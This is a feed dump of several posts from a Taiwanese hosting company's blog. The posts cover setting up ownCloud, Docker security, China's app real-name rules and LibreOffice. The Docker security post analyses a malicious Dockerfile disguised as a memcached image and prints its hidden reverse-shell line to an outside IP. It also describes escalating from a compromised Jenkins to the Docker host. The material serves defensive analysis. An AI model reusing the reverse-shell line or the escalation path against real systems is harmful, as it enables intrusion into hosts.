網管工具分享 | 捕夢網 Blog https://blog.pumo.com.tw 網路安全、資安服務、雲端主機、主機租賃、主機代管、虛擬主機、網站代管專家 Wed, 08 Feb 2017 11:57:06 +0000 zh-TW hourly 1 https://wordpress.org/?v=6.5.5 0元打造 企業私有網路硬碟 https://blog.pumo.com.tw/archives/765 https://blog.pumo.com.tw/archives/765#respond Fri, 04 Nov 2016 08:07:48 +0000 http://blog.pumo.com.tw/?p=765  今天跟大家分享如何建置企業內部私有的網路硬碟,最近要幫公...

The post 0元打造 企業私有網路硬碟 first appeared on 捕夢網 Blog.

]]>
cap-owncloud

 今天跟大家分享如何建置企業內部私有的網路硬碟,最近要幫公司同事建立一個更方便的網路硬碟,找了一堆網路文章,想要好用又便宜,後來被我找到了這套 OwnCloud  ,為什麼是他因為它可以支援幾個我需要的功能:

1.共用資料夾
   公司內部有好幾個部門,每個部門都需要自己部門的公用資料夾,還有特殊的群組,如部門主管共用資料夾,還有那種誰誰誰要共用,誰誰誰只能讀不能寫,OwnCloud對於權限的控管,相當的不錯.

2.多種裝置 (Multi Device)電腦(跨平台 windows 、Mac 、 Linux) 平板跟手機(IOS 、Android)

3.所有的裝置檔案同步  手機跟電腦或者是你家裡的電腦,你新增刪除修改都是同步的,你辦公室電腦把檔案刪除了,回到家裡,你家裡電腦的檔案,同步後,也會被刪除

因為這三個需求,我決定使用 OwnClouc 來建置公司的網路硬碟,廢話不多說,馬上開始

 

安裝需求:

1.需要主機一台 (實體主機 ,雲端主機皆可)

2.需要有一個實體的 IP 跟上網的頻寬

3.作業系統版本 CentOS7

 

安裝主機:

首先開啟一台雲端主機,接著使用快速安裝,安裝CentOS 7 的版本

1.登入捕夢網雲端主機平台

螢幕快照 2016-11-04 下午4.20.06

 

2.使用快速安裝,安裝CentOS 7

螢幕快照 2016-11-04 下午4.36.06

 

 

 ownCloud 在執行前需要安裝的套件如下:

  • MySQL/MariaDB
  • PHP 5.4 +
  • Apache 2.4 with mod_php
  • mod_ssl  與 openssl

安裝 MariaDB 5.5

1.執行指令安裝,我們將使用MariaDB 連結OwnCloud 的mysql database

yum install mariadb-server mariadb

2.啟用 mariadb

 

systemctl start mariadb

3.設定開機啟動 mariadb

systemctl enable mariadb

 

4.設定 資料庫安全性

mysql_secure_installation
NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MySQL
      SERVERS IN PRODUCTION USE!  PLEASE READ EACH STEP CAREFULLY!


In order to log into MySQL to secure it, we'll need the current
password for the root user.  If you've just installed MySQL, and
you haven't set the root password yet, the password will be blank,
so you should just press enter here.

# 輸入 root 的密碼,如果沒有設定過,直接按 Enter 鍵即可
Enter current password for root (enter for none):
OK, successfully used password, moving on...

Setting the root password ensures that nobody can log into the MySQL
root user without the proper authorisation.

# 設定 root 的密碼
Set root password? [Y/n] y
New password:
Re-enter new password:
Password updated successfully!
Reloading privilege tables..
 ... Success!


By default, a MySQL installation has an anonymous user, allowing anyone
to log into MySQL without having to have a user account created for
them.  This is intended only for testing, and to make the installation
go a bit smoother.  You should remove them before moving into a
production environment.

# 移除 anonymous 使用者
Remove anonymous users? [Y/n] y
 ... Success!

Normally, root should only be allowed to connect from 'localhost'.  This
ensures that someone cannot guess at the root password from the network.

# 取消 root 遠端登入
Disallow root login remotely? [Y/n] y
 ... Success!

By default, MySQL comes with a database named 'test' that anyone can
access.  This is also intended only for testing, and should be removed
before moving into a production environment.

# 移除 test 資料表
Remove test database and access to it? [Y/n] y
 - Dropping test database...
 ... Success!
 - Removing privileges on test database...
 ... Success!

Reloading the privilege tables will ensure that all changes made so far
will take effect immediately.

# 重新載入資料表權限
Reload privilege tables now? [Y/n] y
 ... Success!

Cleaning up...



All done!  If you've completed all of the above steps, your MySQL
installation should now be secure.

Thanks for using MySQL!


 

安裝 Apache 2.4

1.執行指令安裝 Apache 2.4

yum install httpd

2.啟動Apache 服務

systemctl start httpd

3.設定開機啟動 Apache

systemctl enable httpd

 

 

測試 Apache 是否安裝成功,開啟瀏覽器  http://你安裝的主機IP/

如果成功的話,畫面如下:

Screen-Shot-2016-05-16-at-1.14.36-PM

 

安裝 PHP 5.5

1.首先安裝 SCL 套件

yum install centos-release-scl

2.安裝 PHP相關模組

yum install php55 php55-php php55-php-gd php55-php-mbstring php55-php-mysqlnd

 

Copy the PHP 5.5 Apache modules into place:

3.複製 PHP 5.5 Apache 模組 設定檔:

cp /opt/rh/httpd24/root/etc/httpd/conf.d/php55-php.conf /etc/httpd/conf.d/

cp /opt/rh/httpd24/root/etc/httpd/conf.modules.d/10-php55-php.conf /etc/httpd/conf.modules.d/

cp /opt/rh/httpd24/root/etc/httpd/modules/libphp55-php5.so /etc/httpd/modules/

4.重新啟動 Apache

systemctl restart httpd

Verify with phpinfo that your Apache server is using PHP 5.5 and loading the correct modules. Create a new file in the httpd directory:

透過 phpinfo 來確認PHP5.5  模組是否載入正常,新增info.php 檔案:

vi /var/www/html/info.php
<?php
phpinfo();
?>

瀏覽下面網址 http://你的主機IP/info.php ,畫面如下:

Screen-Shot-2016-05-16-at-10.51.57-PM

 

 

安裝加密模組,讓檔案傳輸更安全

yum install mod_ssl openssl

我們將會利用 OpenSSL 來產生一張自我簽署的憑證。如果你在一台生產用的伺服器上做這個動作,你應該會想從一個被信賴的憑證機構取得一條金鑰,但假若你只是用在一個私人網站上或作測試之用,自我簽署的憑證已經足夠了。要建立金鑰,你必須是 root 用戶

# 產生私鑰
openssl genrsa -out ca.key 2048

# 產生 CSR
openssl req -new -key ca.key -out ca.csr

# 產生自我簽署的金鑰
openssl x509 -req -days 365 -in ca.csr -signkey ca.key -out ca.crt

# 複製檔案至正確位置
cp ca.crt /etc/pki/tls/certs
cp ca.key /etc/pki/tls/private/ca.key
cp ca.csr /etc/pki/tls/private/ca.csr

 

警告:如果你採用 SELinux,請確保你複製這些檔案而不是遷移它們。否則 Apache 將會投訴關於違漏了的憑證檔,因為它無法讀取這些擁有錯誤 SELinux 脈絡的憑證檔。

假如你遷移了這些檔案而不是複製它們,你可以用以下的指命來矯正這些檔案的 SELinux 脈絡,因為 /etc/pki/* 的正確脈絡定義已包含在 SELinux 政策裡。 

restorecon -RvF /etc/pki

接著我們須要更新 Apache SSL 的設定檔 

vi  /etc/httpd/conf.d/ssl.conf

請修改路徑至金鑰檔案的儲存位置。如果你採用上面的方法,這會是 

原來是 SSLCertificateFile /etc/pki/tls/certs/local.crt
請修改為
SSLCertificateFile /etc/pki/tls/certs/ca.crt

然後在再低數行的位置為憑證金鑰檔案設定正確路徑。如果你按照上面的指引,這會是: 

原來是 SSLCertificateKeyFile /etc/pki/tls/private/local.key
請修改為
SSLCertificateKeyFile /etc/pki/tls/private/ca.key

儲存及離開檔案,然後重新啟動 Apache 

/etc/init.d/httpd restart

 

建立網站,如果你要使用網址登入時,請參考下面設定,如果不需要,也可以直接使用IP來登入

一如你為 http 在連接埠 80 上設立 VirtualHost,你亦可為 https 在連接埠 443 上作樣似的設置。一個在連接埠 80 上的網站的典型 VirtualHost 有如下樣子 

vi /etc/httpd/conf/httpd.conf

到檔案最下方增加下面內容:

<VirtualHost *:80>
        <Directory /var/www/html/你的網址/httpdocs>
        AllowOverride All
        </Directory>
        DocumentRoot /var/www/html/你的網址/httpdocs
        ServerName 你的網址
</VirtualHost>

為了網站安全,設定網站加密port 443,你需要在你的檔案頂部加入下列內容 

NameVirtualHost *:443

然後再加入一個類似如下的 VirtualHost 記錄: 

<VirtualHost *:443>
        SSLEngine on
        SSLCertificateFile /etc/pki/tls/certs/ca.crt
        SSLCertificateKeyFile /etc/pki/tls/private/ca.key
        <Directory /var/www/vhosts/yoursite.com/httpsdocs>
        AllowOverride All
        </Directory>
        DocumentRoot /var/www/html/你的網址/httpsdocs
        ServerName yoursite.com
</VirtualHost>

 

安裝 ownCloud 9 (v9.0.2)

1.執行下列指令進行安裝

rpm --import https://download.owncloud.org/download/repositories/9.0/CentOS_7/repodata/repomd.xml.key

2.下載 yum 安裝檔

wget http://download.owncloud.org/download/repositories/9.0/CentOS_7/ce:9.0.repo -O /etc/yum.repos.d/ce:9.0.repo

3.清除快取,確保你安裝的是最新版本的 OwnCloud 

yum clean expire-cache

4.安裝 OwnCloud 套件

yum install owncloud-files

安裝完成後,開啟瀏覽器 http://你的IP或 你的網址/owncloud ,畫面如下

Screen-Shot-2016-05-16-at-10.22.17-PM

 

修正權限

1.新增一隻執行檔案,這樣可以快速修改檔案權限

vi /tmp/dirperm.sh

2.貼上下面的內容:

#!/bin/bash
ocpath='/var/www/html/owncloud'
htuser='apache'
htgroup='apache'
rootuser='root'

printf "Creating possible missing Directories\n"
mkdir -p $ocpath/data
mkdir -p $ocpath/assets
mkdir -p $ocpath/updater

printf "chmod Files and Directories\n"
find ${ocpath}/ -type f -print0 | xargs -0 chmod 0640
find ${ocpath}/ -type d -print0 | xargs -0 chmod 0750

printf "chown Directories\n"
chown -R ${rootuser}:${htgroup} ${ocpath}/
chown -R ${htuser}:${htgroup} ${ocpath}/apps/
chown -R ${htuser}:${htgroup} ${ocpath}/assets/
chown -R ${htuser}:${htgroup} ${ocpath}/config/
chown -R ${htuser}:${htgroup} ${ocpath}/data/
chown -R ${htuser}:${htgroup} ${ocpath}/themes/
chown -R ${htuser}:${htgroup} ${ocpath}/updater/

chmod +x ${ocpath}/occ

printf "chmod/chown .htaccess\n"
if [ -f ${ocpath}/.htaccess ]
then
chmod 0644 ${ocpath}/.htaccess
chown ${rootuser}:${htgroup} ${ocpath}/.htaccess
fi
if [ -f ${ocpath}/data/.htaccess ]
then
chmod 0644 ${ocpath}/data/.htaccess
chown ${rootuser}:${htgroup} ${ocpath}/data/.htaccess
fi

 

3.修改檔案權限,讓檔案擁有執行的權限

chmod 755 /tmp/dirperm.sh

4.執行 dirperm.sh 檔案

/tmp/dirperm.sh 

畫面會顯示修正完成 ,畫面如下:
Creating possible missing Directories
chmod Files and Directories
chown Directories
chmod/chown .htaccess

重新整理網頁,你會看到畫面如下:

Screen-Shot-2016-05-16-at-10.37.00-PM

 

如果很多人使用的話,為了讓效能更好,可以使用資料庫mysql

1.進入系統執行下列指令,新增資料庫:

mysql -u root -p
Enter password:



CREATE DATABASE owncloudDB;

GRANT ALL ON owncloudDB.* to 'ownclouduser'@'localhost' IDENTIFIED BY 'ENTER_PASSWORD';

FLUSH PRIVILEGES;

quit

選擇Mysql/MariaDB 與檔案儲存位置 還有新增管理者帳號:

Screen-Shot-2016-05-16-at-10.40.08-PM

 

設定完畢後,就可以登入囉,看到這個畫面,雲端的部分就算是完成了

Screen-Shot-2016-05-16-at-10.46.25-PM

 

 

 

建立使用者後,就可以開始用囉

安裝PC端軟體  

網址: https://owncloud.org/install/

螢幕快照 2016-11-04 下午6.31.00

 

電腦支援 Windows / Mac /Linux 真是太強大了

 

螢幕快照 2016-11-04 下午6.39.31

 

手機支援 IOS / Android/ BlackBerry

我覺得有點小小的遺憾,手機需要30元才能安裝,但是這麼完整的功能,30元好像還可以接受.

 

螢幕快照 2016-11-04 下午6.39.42

 

The post 0元打造 企業私有網路硬碟 first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/765/feed 0
Docker安全那些事 https://blog.pumo.com.tw/archives/702 https://blog.pumo.com.tw/archives/702#respond Mon, 11 Jul 2016 03:14:27 +0000 http://blog.pumo.com.tw/?p=702 0x00 前言 在過去的一年,容器正在以驚人的速度發展,國內也有大量...

The post Docker安全那些事 first appeared on 捕夢網 Blog.

]]>
0x00 前言


在過去的一年,容器正在以驚人的速度發展,國內也有大量互聯網公司在生產環境中使用Docker,其中也不乏萬台規模的。前些日子烏雲曝出Swarm配置問題造成的安全隱患,也讓大家對Docker安全提起了關注,本文主要從“Docker自身安全”,“DockerImages安全”和“Docker使用安全隱患”來聊一聊Docker安全那些事。

0x01 Docker自身安全


歸總結了下CVE中關於Docker的漏洞報告,結果如下:

序號

CVE編號

漏洞版本

漏洞名稱

1

CVE-2015-3630

1.6.0

Docker Libcontainer 安全繞過漏洞

2

CVE-2015-3627

1.6.1

Libcontainer和Docker Engine 許可權許可和存取控制漏洞

3

CVE-2015-3630

1.6.1

Docker Engine 安全繞過漏洞

4

CVE-2014-9358

1.3.3

Docker 目錄遍歷漏洞

5

CVE-2014-9357

1.3.2

Docker 許可權許可和存取控制漏洞

6

CVE-2014-6408

1.3.1

Docker 許可權許可和存取控制漏洞

7

CVE-2014-5277

1.3.0

Docker和docker-py 代碼注入漏洞

全部漏洞:https://docs.docker.com/engine/security/non-events/

可以發現Docker存在問題的版本分別在1.3和1.6,因為許可權控制等問題導致可以脫離容器拿到宿主機許可權。Docker在6月發佈了最新版本1.12版本,從1.6到如今的1.12都未爆出漏洞的情況(排除Oday可能)。基於Docker本身來講安全行可以保障的,無論是容器的隔離還是資源限制容器都有著很出色的表現,更多的安全隱患發生在使用者上,因為沒有正確的使用容器或者配置出錯導致了容器的危險運行。

0x02 DockerImages安全


容器的環境是基於容器鏡像,一旦容器鏡像存在風險那麼容器的安全性也要大打折扣了。我們在看容器鏡像又是根據Dockerfile一層層疊加的,如下圖:

docker_image

底層Base鏡像引用“atiger77:1.0”,第二層鏡像在此之上添加run.sh腳本到容器目錄中,第三層鏡像是指在容器運行時執行run.sh腳本。Docker鏡像有自己的緩存機制,構建時會逐層往上進行檢查,底層鏡像如果沒有產生變動,則跳過構建使用鏡像Cache來節省構建時間,如果檢測到變動則開始進行構建動作。

這裡主要分兩種情況來討論容器鏡像的安全。

  1. SoftwareVulnerability(鏡像中使用的軟體存在高危漏洞)
  2. BadImages(存在後門的容器鏡像)

1.SoftwareVulnerability

還是根據剛才的鏡像分層來說,底層Base鏡像中如果使用的軟體存在高危漏洞,那麼所有使用Base鏡像所構建出的鏡像都會存在問題。我們來舉個栗子:

docker_file

上圖中Base鏡像只安裝基礎依賴組件,其中套裝軟體abc有高危漏洞。根據Base鏡像打出需要的鏡像,左邊的鏡像是添加了代碼目錄到容器中,右邊則構建了一個編譯gcc的基礎鏡像。那麼當Base鏡像中的abc軟體存在高危漏洞,那麼所有相關依賴的鏡像就都存在了風險。當出現這種情況時,需要先修復Base鏡像中的問題軟體,完成後一次對依賴的鏡像重新進行構建動作。

根據上述情況,我分別從dockerhub和github中下載了部分鏡像進行真實測試,

測試漏洞:Bash漏洞,測試代碼:https://github.com/hannob/bashcheck/blob/master/bashcheck

測試版本:
分別使用官方鏡像進行測試,版本為centos5.11/6.6/7.2

docker_images_all

測試過程:

Version:5.11images_centos_5

Version:6.6images_centos_6

Version:7.2images_centos_7

測試結果:
從測試結果可以看到官網下載的centos5.11和centos6.6都存在BASH漏洞(CVE-2014-6277)。查看了下CVE記錄時間為2014年9月9日,官方給出的centos6.6上次更新時間是2015年的5月4日然後並沒有修復該漏洞。

CVE報告時間:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277

Docker-Centos6.6官方dockerfile地址:https://github.com/CentOS/sig-cloud-instance-images/blob/8911843d9a6cc71aadd81e491f94618aded94f30/docker/Dockerfile

雖然Base鏡像已然存在這個漏洞,但是容器用來跑服務的,一般情況下是不需要進入容器進行操作的,這裡我演示的只是一個通用漏洞,當然還會存在其他服務的漏洞容器鏡像,這裡還是給出自己的建議,公司使用容器基礎鏡像需要自己構建,保證Base鏡像的乾淨和安全,現在也有很多小夥伴開始使用alpine的鏡像,一個centos也就幾十M搞定了。

其實到這邊容器安全都是在可控範圍內的,即使使用的服務或者應用有問題使得攻擊者上傳了webshell,操作的範圍也只是在容器內並不會對宿主機產生影響,那麼容器就真的安全了嘛?也不儘然,下面我會講如何通過容器拿到宿主機許可權。

2.BadImages

BadImages不是值“壞掉的鏡像”而是說那些“惡意鏡像”,翻了下烏雲所有帶“Docker”和“容器”關鍵字的漏洞,大部分提交的漏洞都是通過Swarm沒有配置正確,從而通過遠端API實現了未授權訪問,相關的解法可以參考“駭客,絕對是駭客”之前寫的文章(http://drops.wooyun.org/papers/15892)。在所有Docker的容器中發現一個比較有意思的,利用自己編寫的dockerfile執行反彈shell拿到了某公有雲一台機器,讓我們看下章總的dockerfile

1

2

3

4

5

6

7

8

9

10

11

12

13

FROM ubuntu

MAINTAINER Victor Coisne victor.coisne@dotcloud.com

RUN sleep 1

RUN cat /etc/passwd

RUN echo "deb http://mirrors.163.com/ubuntu/ precise main restricted universe multiverse" > /etc/apt/sources.list

RUN apt-get update

RUN echo "while ((1));do sleep 1;echo 111;/bin/sh -i >& /dev/tcp/1.1.1.1/1234 0>&1;done" >> /tmp/1.sh

RUN bash /tmp/1.sh

RUN sleep 20

RUN apt-get install -y memcached

ENTRYPOINT [“memcached”]

USER daemon

EXPOSE 11211

第一眼看是啟動memcached的一個dockerfile,仔細一看發現其中別有洞天,在構建過程中存在了一個反彈shell,由於該廠商自有服務的api沒有和使用者環境隔離做很好的隔離導致反彈shell成功。

我們來分析一下這種情況帶來的危害,網上很多的說法都是不要使用非官方的鏡像,其實也不儘然官方鏡像也不是完全沒有問題這一點之前也分析過了,在我看來非官方的鏡像不是不能用,只是有些鏡像作者沒有寫任何的介紹或者使用方法,dockerfile也不上傳這類鏡像還是不建議使用了,有介紹的鏡像還是花點時間看下dockerfile的寫法到底安裝和執行了哪些內容。當然容器相比傳統的宿主機而言安全性是更好的,這也要歸功於容器的快速反覆運算,使用容器可以加快整個開發交付流程,即使容器被掛了webshell幾天後版本更新會上就會啟動一個新的容器,之前的容器也不復存在了。

0x03 Docker使用安全隱患


Docker本身的安全性是值得信賴的,更多的還是人為使用的錯誤導致了安全隱患,大家印象裡都對Swarm沒有正確配置導致的安全問題比較瞭解,使用Swarm的同學可以參考下阿裡容器服務的玩法,Swarm配置了tls,使用者連接自己Swarm的時候,需要下載證書,使用證書才能和swarm建立tls連接。這裡我會講另一個docker使用場景中會出現的安全隱患以及一些使用docker的注意事項。

Docker的出現加快了整個開發-測試-上線流程,其中我們會使用Jenkins來做持續化集成的工作,簡化流程大致如下(這裡只介紹大概流程讓大家有個印象,省去詳細的流程):

1.開發本地編寫代碼,開發環境通過 –> 2.測試環境進行UT等其他測試,測試環境通過 –> 3.發佈線上環境

當容器用在生產環境中,那麼作為Jenkins而言就起到了CICD的作用,通過Jenkins-Master接受任務分配給對應Slave執行,通過後並將代碼打包到鏡像中發送上線。

讓我們看一下大致的Compose檔長什麼樣:

jenkins_compose

compose運行在jenkins中設置完畢,主就可以把任務分配給從,並且由從進行測試構建編譯打包成容器等動作。為了讓jenkins-slave能在編譯完成後在宿主機中打鏡像而不是在容器內部,在compose中從掛卷將宿主機的/var/run/docker.sock掛到了容中,並且賦予了"privileged"許可權,這個寫法其實並沒有什麼問題,為了讓從能構建鏡像所以賦予root許可權,恰恰是這樣一旦jenkins被攻破那麼就會對宿主機的安全造成了威脅,這裡拿測試環境給大家演示一下。

環境:假設現在有一台Jenkins,攻擊者通過爆破破解,弱密碼嘗試甚至沒有密碼的情況進入了Jenkins管理頁面。

攻擊思路:由於jenkins-slave有著root許可權,我們需要拿到jenkins-slave許可權然後進行提權操作,從而獲取宿主機許可權。

攻擊過程:

  1. 確定節電中已經添加slave

jenkins_hack_01

  1. 添加任務並分配給slave

jenkins_hack_02

  1. 查看Slave宿主機中存在的容器列表

jenkins_hack_03

注:預設使用者是jenkins,執行時需要加上sudo否則提示許可權不足。這裡可以看到擁有了privileged許可權的slave容器獲得了宿主機的許可權。

  1. 在"Execute shell"中下載帶有ssh服務的DockerImage

docker_hack_01.jpg

  1. 對宿主機所在機器進行埠掃描,可以發現2016埠狀態為open

docker_hack_02.jpg

注釋:本人是測試環境就寫了內網IP。

  1. 登錄宿主機2016埠添加公開金鑰

docker_hack_03.jpg

  1. 登錄宿主機的22埠,獲取宿主機許可權

docker_hack_04.jpg

加固方法:
Docker搭配Jenkins使用為了加快交付流程必然會出現許可權問題,這裡提供一種解法儘量避免危害,首先jenkins不要放在公網上,登錄介面可以使用JIRA外掛程式,在JIRA中設置密碼複雜度。

其他想說的:

這裡還想提一下容器創建時一定要加上最大資源使用上限,容器在宿主機中就是個進程,一旦出現記憶體洩露或者Forkbomb類似的事件,宿主機的資源會消耗殆盡導致主機上的所有主機都不可用,建議在服務上線前先預估使用量。

Docker在操作者正確使用的情況下,安全性是可以得到保障的,就拿Jenkins的例子來說雖然開了privilege,要拿到宿主機的許可權還是會碰到許許多多的問題,最後提權用了4天,嘗試了37次構建,各種能想到的辦法都用了,很多辦法只能拿到容器層始終沒辦法提權到主機。

文章來源:http://drops.wooyun.org/tips/17416

圖片來源:https://pixabay.com/

The post Docker安全那些事 first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/702/feed 0
2016/8/1起伺服器在中國大陸的 APP 需實名制登記與記錄該使用者日誌並保存 60 天備查! https://blog.pumo.com.tw/archives/696 https://blog.pumo.com.tw/archives/696#respond Mon, 11 Jul 2016 02:55:19 +0000 http://blog.pumo.com.tw/?p=696 簡單而言之,未來當你使用中國大陸的 APP(例如: 微信、支付寶、美...

The post 2016/8/1起伺服器在中國大陸的 APP 需實名制登記與記錄該使用者日誌並保存 60 天備查! first appeared on 捕夢網 Blog.

]]>
簡單而言之,未來當你使用中國大陸的 APP(例如: 微信、支付寶、美圖秀秀、愛奇藝)或其他常見的APP,不僅要實名驗證。而你在APP上的所有資料及紀錄都要再保留60天。

此一規定等同要求APP開發人員必須落實資訊安全的管理責任,包括針對註冊用戶進行真實的身份認證,同時記錄用戶的使用行為並保存60天。另也要求程式市集(中國將其稱為App超市)核對開發人員的身份並建立信用管理制度。

另一方面,新規定強化了對使用者的保障,要求開發人員在用戶同意下才能蒐集使用者資訊,必須闡明所蒐集資訊的目的與用途,不得開啟與服務無關的功能或捆綁安裝無關的應用程式。

雖然部份美國媒體認為該規定只是中國進一步落實網路實名制,以監控行動程式用戶及開發人員的另一個手段。

但""中國評論家""指出,這項規定不但明確禁止開發人員打造含有違法訊息或惡意功能的程式,也詳列了對使用者隱私權的保障。

相關查證資料:
中國互聯網信息辦公室(網信辦)《移動互聯網應用程序信息服務管理規定》
http://www.cac.gov.cn/2016-06/28/c_1119123114.htm

中國行動程式管理規定8月上路,大力整頓中國App生態
http://www.ithome.com.tw/news/106766

中國網信辦:手機應用程序需真實身份認證
http://www.bbc.com/…/2016/06/160628_cac_mobile_app_new_rules

中國網訊辦發新例,安裝任何大陸 Apps 後使用者如同全裸!
http://qooah.com/2016/06/29/china-apps-develop-rules/

文章來源:https://www.facebook.com/netwargame/photos/a.178682542180604.36168.172306986151493/1034723649909818/?type=3&theater

圖片來源:https://pixabay.com

The post 2016/8/1起伺服器在中國大陸的 APP 需實名制登記與記錄該使用者日誌並保存 60 天備查! first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/696/feed 0
中國網訊辦發新例,安裝任何大陸 Apps 後使用者如同全裸! https://blog.pumo.com.tw/archives/693 https://blog.pumo.com.tw/archives/693#respond Mon, 11 Jul 2016 02:35:28 +0000 http://blog.pumo.com.tw/?p=693 現在智能手機的出現,相信不少人都會裝上不同的 Apps,而開發這些 ...

The post 中國網訊辦發新例,安裝任何大陸 Apps 後使用者如同全裸! first appeared on 捕夢網 Blog.

]]>
現在智能手機的出現,相信不少人都會裝上不同的 Apps,而開發這些 Apps 的人員來自世界各地,當然也有內地的開發商,例如在中港非常流行的微信,防毒的 360,以及一類美圖拍攝、網上購物、音樂播放或電影播放類 Apps 等,但是現在大家可能要再考慮是否真的需要安裝任何來自中國大陸所開發的 Apps。

原因是來目中國國家互聯網信息辦公室今日發佈全新的《移動互聯網應用程序信息服務管理規定》,在有關的規定中,程式開發商需履行六項義務,如下:

  1. 按照“後台實名、前台自願”的原則,對註冊用戶進行基於移動電話號碼等真實身份信息認證。
  2. 建立健全用戶信息安全保護機制,收集、使用用戶個人信息應當遵循合法、正當、必要的原則,明示收集使用信息的目的、方式和範圍,並經用戶同意。
  3. 建立健全信息內容審核管理機制,對發布違法違規信息內容的,視情採取警示、限制功能、暫停更新、關閉賬號等處置措施,保存記錄並向有關主管部門報告。
  4. 依法保障用戶在安裝或使用過程中的知情權和選擇權,未向用戶明示並經用戶同意,不得開啟收集地理位置、讀取通訊錄、使用攝像頭、啟用錄音等功能,不得開啟與服務無關的功能,不得捆綁安裝無關應用程序。
  5. 尊重和保護知識產權,不得製作、發布侵犯他人知識產權的應用程序。
  6. 記錄用戶日誌信息,並保存六十日。

這些規定將於 8 月 1 日正式執行。

有關規定美其名是加強手機應用程式的管理、保障用戶在安裝或使用程式時的知情權和選擇權,及尊重和保護知識產權,對一類流氓應用的管制絕對是好事。但是有安裝 Apps 的朋友都會留意到不少 Apps 都會要求收集用戶個人資料才能使用,而最大問題是可保存個人用戶過去六十日的日誌信息紀錄。即是說,在這六十日裡,用戶所有使用 Apps 的動作都會被完整地記錄下來。如是一些聊天、網購、電郵等應用的話,用戶所輸入及處理等動作或也會被記錄。若然這些敏感資料被有心人所獲得,影響效果將非常深遠。

開發商可保存用戶紀錄已經有問題,但是如果有一日內地政府有需要向 Apps 開發商索取個人資料的時候,她們能夠跟 Apple 一樣以保護私隱的名義不提供嗎?

所以在在安裝 Apps 時,尤其是內地開發商的推出出的話,大家要看清楚權限才決定是否安裝。

文章來源:http://qooah.com/2016/06/29/china-apps-develop-rules/

圖片來源:https://pixabay.com

The post 中國網訊辦發新例,安裝任何大陸 Apps 後使用者如同全裸! first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/693/feed 0
好用又強大的Office 文書編輯軟體- LibreOffice https://blog.pumo.com.tw/archives/474 https://blog.pumo.com.tw/archives/474#respond Mon, 16 May 2016 05:53:59 +0000 http://blog.pumo.com.tw/?p=474   LibreOffice 原自Openoffice.or...

The post 好用又強大的Office 文書編輯軟體- LibreOffice first appeared on 捕夢網 Blog.

]]>
 

LibreOffice-wallpapers-LibreOffice 原自Openoffice.org 開源軟體,裡面提供了類似 Microsoft Office WordExcelPowerPoint、小畫家等等的編輯工具,使用者可以免費下載,任意安裝於任何平台,且不需要付高額的授權費。

LibreOffice 功能與外觀大致上還是延續 OpenOffice,功能包含文書編輯(Writer)試算表(Calc)簡報(Impress)繪圖(Draw)資料庫管理(Base)等等,使用方式跟微軟的文書處理工具一樣,可以支援DOCDOCXXLSXLSXPPT等等。

 

LibreOffice 與MS Office 產品對照圖:

LiberOffice Writer (左)與 MS word(右) 外觀:

compare01

 

LiberOffice Calc(左) 與 MS Excel(右) 外觀:

compare02

 

LiberOffice Impress (左)與 MS PowerPoint (右) 外觀:

compare03

 

LiberOffice Draw (左)與 MS 小畫家(右) 外觀:

compare04

 

LibreOffice 提供了包含繁體中文、簡體中文、英文、日文、韓文數十國語言的使用者介面,可以跨平台支援不同的作業系統,如Windows Mac OSXLinux 等等常見的作業系統。

不想花錢又像要好用的文書管理系統趕快下載:

軟體名稱:LibreOffice

  • 軟體版本:5.1.3

  • 軟體語言:繁體中文、簡體中文、英文…等多國語言

  • 軟體性質:免費軟體,個人、家庭或公司皆可免費使用

  • 檔案大小:211 MB

  • 系統支援:WindowsMac OS X Linux 等系統

  • 官方網站:http://www.libreoffice.org/

     

 

LibreOffice 新鮮版

若想取得 LibreOffice 的商業支援,請查看我們認證過的合作廠商列表

LibreOffice 新鮮版是帶有嶄新功能的穩定版本。希望使用最新功能的使用者,請使用此版本。

主安裝程式

 

LibreOffice 的 中文 (正體) 內建說明

 

SDK 與源始碼

下載 SDK

LibreOffice_5.1.3_Win_x86_sdk.msi
28 MB (Torrent
資訊)

下載源始碼

作業系統

LibreOffice 5.1 可用於下列作業系統與架構:

可用的版本

LibreOffice 有下列 已發行 版本:

 

下載LibreOffice_5.1.3_Win_x86_sdk.msi 後,在 Windows 10的安裝畫面:

點擊安裝:

install02

選擇一般安裝:

install03

進行開始安裝:

install04

安裝中..

install05

安裝中..

install05-2

安裝完成:

install06

安裝完成,在windows 10的開始列表:

install07

 

The post 好用又強大的Office 文書編輯軟體- LibreOffice first appeared on 捕夢網 Blog.

]]>
https://blog.pumo.com.tw/archives/474/feed 0